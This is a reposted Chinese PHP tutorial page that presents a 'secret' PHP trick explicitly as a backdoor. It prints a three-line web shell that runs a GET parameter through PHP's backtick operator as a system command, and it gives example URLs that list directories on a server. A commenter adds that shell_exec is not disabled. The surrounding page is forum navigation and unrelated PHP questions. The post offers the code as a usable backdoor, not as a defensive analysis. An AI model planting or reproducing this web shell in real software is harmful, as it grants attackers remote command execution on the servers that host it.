简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Home > Backend Development > PHP Tutorial > body text

<转载>一个官方没公布的php秘籍,可用作后门

WBOY
Release: 2016-06-13 10:56:07
Original
903 people have browsed it

一个官方没有公布的php秘籍,可用作后门

可以看看

http://www.webshell.cc/3303.html

好奇怪的漏洞?

可以当做个小马使用,比较有意思的一个东西

写道
被过滤广告
发现这个也是巧合,我就直接说了吧

//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webshell.cc/t.php?r=dir

可以列出目录

http://webshell.cc/t.php?r=echo

我是马儿 D:\web\webshell.cc.php

大家觉得我没有忽悠 就赏点分哈


文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html

?

?

?

1 楼 hoodbc 2012-09-13  
shell_exec 没有禁用
Related labels:
echo http php webshell
source:php.cn
Previous article:php学习日记 Next article:PHP软件工程师突破成长瓶颈(转载)
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
function_exists() cannot determine the custom function Function test () {return true;} if (function_exists ('test')) {echo "test is function...
From 2024-04-29 11:01:01
0
2
1532
How to display the mobile version of Google Chrome Hello teacher, how can I change Google Chrome into a mobile version?
From 2024-04-23 00:22:19
0
10
1688
The child window operates the parent window, but the output does not respond. The first two sentences are executable, but the last sentence cannot be implemented.
From 2024-04-19 15:37:47
0
1
1435
There is no output in the parent window document.onclick = function(){ window.opener.document.write('I am the output of the child ...
From 2024-04-18 23:52:34
0
1
1364
Where is the courseware about CSS mind mapping? Courseware
From 2024-04-16 10:10:18
0
0
1411
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!